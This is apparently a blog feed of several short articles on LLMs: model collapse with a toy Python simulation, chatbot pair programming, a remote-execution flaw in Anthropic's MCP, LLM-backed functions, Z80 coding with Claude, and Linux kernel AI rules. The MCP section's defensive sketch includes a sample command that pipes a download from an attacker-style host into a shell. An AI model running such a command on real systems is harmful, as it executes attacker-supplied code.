Why Model Collapse In LLMs Is Inevitable With Self-Learning

There is a persistent belief in the ‘AI’ community that large language models (LLMs) have the ability to learn and self-improve by tweaking the weights in their vector space. Although there’s scant evidence that tweaking a probability vector space is anything like the learning process in biological brains, we nevertheless get sold the idea that artificial general intelligence (AGI) is just around the corner if we do just enough tweaking.

Instead of emerging superintelligence, the most likely outcome is what is called model collapse, with a recent paper by [Hector Zenil] detailing why self-training (or self-learning) in LLMs and similar systems is a fool’s errand. For those who just want the brief summary with all the memes, [Metin] wrote a blog post covering the basics.

In the end, an LLM, like a diffusion model (DM), is a statistical model of its input data, from which a statistically likely output can be generated (inferred) for a given input query. It follows intuitively that if that output is used to adjust the model, the model will over time converge on a kind of statistical singularity rather than some ‘AI singularity’ event. This is also why these models need to be continually trained with external, human-generated data to prevent such a collapse.

In his paper, [Hector] constructs a mathematical model demonstrating that an LLM, DM, or similar statistical model undergoes degenerative dynamics whenever that external input is reduced. Although the paper suggests a mechanism to counter the entropy decay within the model, its ultimate point is that a statistical model cannot improve itself without continuous external anchoring.
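To make the intuition concrete, here is a toy simulation in Python. It is not the model from [Hector]’s paper, just a minimal sketch under simple assumptions: the “model” is a table of token frequencies, “training” is counting tokens in a sample, and “inference” is sampling from that table. Any token that happens not to be drawn in one generation gets probability zero and can never come back, so retraining purely on self-generated output steadily loses diversity, while mixing in a fraction of fresh samples from the original distribution (the external anchoring) keeps it alive. The vocabulary size, sample size and anchoring fraction are arbitrary illustrative choices.

```python
import math
import random
from collections import Counter


def entropy(probs: dict[str, float]) -> float:
    """Shannon entropy of a token distribution, in nats."""
    return sum(-p * math.log(p) for p in probs.values() if p > 0)


def refit(samples: list[str]) -> dict[str, float]:
    """Maximum-likelihood 'training': token frequencies in the sample.
    Any token that happens not to be sampled gets probability zero."""
    counts = Counter(samples)
    return {tok: c / len(samples) for tok, c in counts.items()}


def draw(probs: dict[str, float], n: int, rng: random.Random) -> list[str]:
    """'Inference': sample n tokens from the model's distribution."""
    tokens = list(probs)
    return rng.choices(tokens, weights=[probs[t] for t in tokens], k=n)


def simulate(true_probs, generations, n_samples, anchor_fraction, seed=0):
    """Retrain on the model's own output each generation, optionally mixing in
    a fraction of fresh samples from the true (external, 'human') distribution."""
    rng = random.Random(seed)
    model = dict(true_probs)
    n_fresh = round(n_samples * anchor_fraction)
    history = [entropy(model)]
    for _ in range(generations):
        synthetic = draw(model, n_samples - n_fresh, rng)
        fresh = draw(true_probs, n_fresh, rng)  # empty when anchor_fraction == 0
        model = refit(synthetic + fresh)
        history.append(entropy(model))
    return history


# Toy 'language': 20 tokens with Zipf-like frequencies.
vocab = [f"tok{i}" for i in range(20)]
norm = sum(1 / (i + 1) for i in range(20))
true_probs = {t: (1 / (i + 1)) / norm for i, t in enumerate(vocab)}

self_only = simulate(true_probs, generations=300, n_samples=50, anchor_fraction=0.0)
anchored = simulate(true_probs, generations=300, n_samples=50, anchor_fraction=0.3)
print(f"initial entropy:           {self_only[0]:.2f} nats")
print(f"after 300 self-trained:    {self_only[-1]:.2f} nats")
print(f"after 300 with anchoring:  {anchored[-1]:.2f} nats")
```

Exact numbers depend on the seed, but in this setup the self-trained run drifts toward a handful of tokens or even a single one, while the anchored run keeps its entropy well above zero.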

The idea that LLMs are intelligent in any sense has long been contentious, and equating language models with ‘AI’ dates back to the 20th century, including in fun home computer projects. Much of the problem probably lies in humans projecting intelligent behavior onto these statistical models, turning LLMs into ‘counterfeit humans’, which is not helped by how closely generated text can resemble human writing, even when it is completely confabulated.

Thanks to [deshipu] for the tip.

Trying Pair Programming With An LLM Chatbot

When it comes to software developers, there are a few distinct types. For example, there is the extroverted, chatty type, who is always out there sharing the newest libraries and projects with everyone, and is very much into bouncing ideas off others, regardless of whether the listener knows what they’re talking about. Then there is the introverted loner, who prefers to tackle programming challenges by bouncing things around inside their own mind and going on long walks to mull things over before committing to anything significant.

This leads to interesting scenarios when it comes to management-enforced ‘optimization’ strategies like Pair Programming. This approach involves two developers sharing the same computer and keyboard, theoretically doubling the effective output by some metric, but in practice often leaving at least one side feeling pretty miserable and disconnected, unless you put two of the chatty types together.

As a certified introverted loner developer, I find that the idea of using an LLM chatbot as a coding assistant naturally triggers unpleasant flashbacks to hours of forced, awkward pair ‘programming’. However, maybe using an LLM chatbot could be more pleasant, since you get to skip the whole awkward socializing bit. To give it a try, I put together a little experiment to see whether LLM-based coding assistants are something I could come to appreciate, unlike pair programming.

How Anthropic’s Model Context Protocol Allows For Easy Remote Execution

As part of the effort to push Large Language Model (LLM) ‘AI’ into more and more places, Anthropic’s Model Context Protocol (MCP) has been adopted as the standard for connecting LLMs with various external tools and systems in a client-server model. A slight oversight in the architecture of this protocol is that remote code execution (RCE) of arbitrary commands is effectively an essential part of its design, as covered in a recent article by [OX Security].

The flaw is laid out in a detailed breakdown article, and it applies to all implementations regardless of programming language. Essentially, the StdioServerParameters passed to the remote server to create a new local instance on that server can contain any command and arguments, which are then executed in a server-side shell.
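As a rough illustration of why this matters, here’s a hypothetical Python sketch. StdioLaunchRequest is a made-up stand-in rather than the SDK’s own StdioServerParameters class, carrying just the two fields at issue: an executable and its arguments. A launcher that trusts whatever arrives will happily build a command line for sh -c, while even a crude allowlist of vetted command lines refuses it. Nothing here actually spawns a process, and the allowlisted server name is invented.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class StdioLaunchRequest:
    """Hypothetical stand-in for a client-supplied 'launch this server' request,
    carrying the two fields at issue: an executable and its arguments."""
    command: str
    args: tuple[str, ...] = ()


# Hypothetical allowlist: the exact command lines an operator has vetted.
ALLOWED_LAUNCHES = {
    ("python", ("-m", "my_vetted_mcp_server")),
}


class RejectedLaunch(Exception):
    """Raised when a request asks for a command line nobody approved."""


def naive_argv(req: StdioLaunchRequest) -> list[str]:
    # Trusting launcher: whatever the client sends becomes the command line.
    return [req.command, *req.args]


def vetted_argv(req: StdioLaunchRequest) -> list[str]:
    # Only build a command line that exactly matches a vetted entry.
    if (req.command, tuple(req.args)) not in ALLOWED_LAUNCHES:
        raise RejectedLaunch(f"refusing to launch {req.command!r} with {list(req.args)!r}")
    return [req.command, *req.args]


evil = StdioLaunchRequest("sh", ("-c", "curl https://attacker.example/x | sh"))
print(naive_argv(evil))  # the injected shell command goes straight through
try:
    vetted_argv(evil)
except RejectedLaunch as err:
    print(err)
```

An allowlist is only one possible mitigation, not necessarily the one OX Security recommends; whether a launcher goes through a shell or spawns the process directly, an attacker-chosen command is still an attacker-chosen command.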

AI For The Skeptics: The Universal Function For Some Things Only

It’s a phrase we use a lot in our community, “Drink the Kool-Aid”, meaning to become unreasonably infatuated with a dubious idea, technology, or company. It has its origins in 1960s psychedelia, but given that it’s popularly associated with the mass suicide of the followers of Jim Jones in Guyana, perhaps we should find something else. In the sense we use it, though, it has been flowing liberally of late when it comes to AI and the hype surrounding it. This series has attempted to peer behind that hype, first by examining the motives behind all that metaphorical Kool-Aid drinking, and then by demonstrating a simple example where the technology does something useful that’s hard to do another way. In that last piece we touched upon what Hackaday readers should perhaps find most interesting: the LLM’s potential as a universal API for useful functions.

It’s Not What An LLM Can Make, It’s What It Can Do

When we program, we use functions all the time. In most programming languages they are either built into the language or user-defined. They encapsulate a piece of code that does something, so that it can be called repeatedly. Life without them on an 8-bit microcomputer was painful, with many GOTO statements required to make something similar happen. It’s no accident, then, that when looking at an LLM as a sentiment analysis tool in the previous article I used a function GetSentimentAnalysis(subject,text) to describe what I wanted to do. The LLM’s processing capacity was a good fit for the task at hand, so I used it as the engine behind my function, taking a piece of text and a subject, and returning an integer representing sentiment. The word “do” encapsulates the point of this article: maybe the hype has got it wrong in being all about what an LLM can make, when instead it should be all about what it can do. The people who think they’ve struck gold because they can churn out content slop or make it send emails are missing this.
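For the programmers in the audience, the idea can be sketched in Python like this. It is a hypothetical take on GetSentimentAnalysis(subject,text), not the code from the previous article: the llm argument stands in for whatever chat-completion call you actually use, and the -10 to 10 scale and the prompt wording are assumptions. The important bit is the wrapping: the caller gets an ordinary function returning an integer, with the model’s free-form reply parsed and clamped so it can’t leak out.

```python
import re
from typing import Callable


def get_sentiment_analysis(subject: str, text: str, llm: Callable[[str], str],
                           low: int = -10, high: int = 10) -> int:
    """Hypothetical LLM-backed function: sentiment of `text` towards `subject`
    as an integer in [low, high]. `llm` is any prompt -> reply callable."""
    prompt = (
        f"Rate the sentiment of the following text towards {subject!r} "
        f"as a single integer from {low} (very negative) to {high} (very positive). "
        "Reply with the integer only.\n\n"
        f"Text:\n{text}"
    )
    reply = llm(prompt)
    # Models don't always obey 'integer only', so take the first integer found.
    match = re.search(r"-?\d+", reply)
    if match is None:
        raise ValueError(f"no integer in model reply: {reply!r}")
    # Clamp, so an out-of-range answer can't escape the function's contract.
    return max(low, min(high, int(match.group())))


def fake_llm(prompt: str) -> str:
    # Canned stand-in for a real model, so the sketch runs offline.
    return "Score: 7"


print(get_sentiment_analysis("the Z80", "Still a lovely chip to program.", fake_llm))
```

Because the model sits behind an ordinary function signature, the rest of a program neither knows nor cares that an LLM is doing the work, and a canned stand-in like fake_llm makes it easy to exercise that program without calling a real model.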

Can Claude Write Z80 Assembly Code?

Betteridge’s law applies, but with help and guidance from a human who knows his stuff, [Ready Z80] was able to get a functioning game of Wordle out of the French-named LLM, which is more than we expected. It’s not as if the folks at Anthropic spent much time making sure 40-year-old opcodes were well represented in their training data, after all.

For hardware, [Ready Z80] is working with the TEC-1G single-board computer, a retrocomputer inspired by the TEC-1, whose design was published by the Australian hobbyist magazine “Talking Electronics” back in the 1980s. Claude actually seemed to know what that was, and that it only had a hex keypad. When [Ready Z80] corrected it and explained that he was using a QWERTY keyboard add-on, Claude declared itself confident in its ability to write the code.

As is usual for an LLM, Claude was overconfident and tossed out some nonexistent instructions, though admittedly it didn’t persist in that after being corrected. It’s notable that [Ready Z80] doesn’t prompt it with “Give me an implementation of Wordle in Z80 assembly for the TEC-1G” but instead goes through step by step, explaining exactly what he wants each section of the code to do. As [Dan Maloney] reported three years ago, it’s a bit like working with a summer intern.

In the end, they get a working game, but that was never in question. Over the course of the video, [Ready Z80] reveals that he has the chops to have written it himself. Did using Claude make that go faster? Based on studies we’ve seen, it probably felt like it, even if it may actually have slowed him down.

AI For The Skeptics: Attempting To Do Something Useful With It

As a writer, you know some subjects need to be written about, even as you steel yourself for the inevitable barrage of criticism once your work reaches its audience. The latest of these is AI, or more specifically the current enthusiasm for Large Language Models, or LLMs. On one side we have the people who’ve drunk a little too much of the Kool-Aid and are frankly a bit annoying on the subject, while on the other we have those who are infuriated by the technology. Given the tide of low-quality AI slop to be found online, we can see the latter group’s point.

This is the second in what may become an occasional series looking at the subject from the perspective of wanting to find the useful stuff behind the hype: what is likely to fall by the wayside, and what as-yet-unheard-of applications will turn this thing into something more useful than a slop machine or an agent that might occasionally automate some of your tasks correctly. In the previous article I examined the motivation of that annoying Guy In A Suit, whom many of us will have encountered, who wants to use AI for everything because it’s shiny and new; in this one I’ll try to do something useful with it myself.

New Linux Kernel Rules Put The Onus On Humans For AI Tool Usage

It’s fair to say that the topic of so-called ‘AI coding assistants’ is somewhat controversial. With arguments against them ranging from code quality to copyright issues, there are many valid reasons to be at least hesitant about accepting their output in a project, especially one as massive as the Linux kernel. With a recent update to the Linux kernel documentation the use of these tools has now been formalized.

The upshot is that any commit containing code generated by such Large Language Model (LLM) tools has to be signed off by a human developer, and this human ultimately bears responsibility for the code quality as well as any issues the code may cause, including legal ones. The use of AI tools also has to be declared with the Assisted-by: tag in contributions so that their use can be tracked.
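Purely as an illustration of what the two tags look like in practice, here is a hypothetical Python check a maintainer might run over a commit message. It is not part of the kernel’s tooling, the Assisted-by: value shown is a placeholder (the kernel documentation defines the exact format), and no script can tell whether the human who signed off actually reviewed the code; it can only see whether the tags are there.

```python
def parse_trailers(message: str) -> dict[str, list[str]]:
    """Naively collect 'Key: value' trailer lines from the last paragraph
    of a commit message (the subject line alone has no trailers)."""
    paragraphs = message.strip().split("\n\n")
    if len(paragraphs) < 2:
        return {}
    trailers: dict[str, list[str]] = {}
    for line in paragraphs[-1].splitlines():
        key, sep, value = line.partition(":")
        key = key.strip()
        if sep and key and " " not in key:
            trailers.setdefault(key, []).append(value.strip())
    return trailers


def check_ai_disclosure(message: str, used_ai: bool) -> list[str]:
    """Hypothetical policy check: a Signed-off-by is always required, and an
    Assisted-by tag is required whenever an AI tool was used."""
    trailers = parse_trailers(message)
    problems = []
    if not trailers.get("Signed-off-by"):
        problems.append("missing Signed-off-by line")
    if used_ai and not trailers.get("Assisted-by"):
        problems.append("AI tool used but no Assisted-by tag")
    return problems


msg = """mm: fix off-by-one in example_func

Longer description of the change.

Assisted-by: ExampleAgent:example-model
Signed-off-by: Jane Developer <jane@example.org>
"""
print(check_ai_disclosure(msg, used_ai=True))
```

For real-world use, git’s own git interpret-trailers --parse extracts trailers far more robustly than this naive last-paragraph scan.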

When it comes to other open source projects, the approach varies: NetBSD has banned anything tainted by ‘AI’, cURL shuttered its bug bounty program due to a flood of AI slop submissions, and Mesa’s developers demand that you understand any generated code you submit, following a tragic slop-cident.

Meanwhile, there are also rising concerns that these LLM-based tools may be killing open source through ‘vibe-coding’, along with legal concerns over whether LLM-generated code respects the original licenses of the code ingested as training data. Clearly we haven’t seen the end of these issues yet.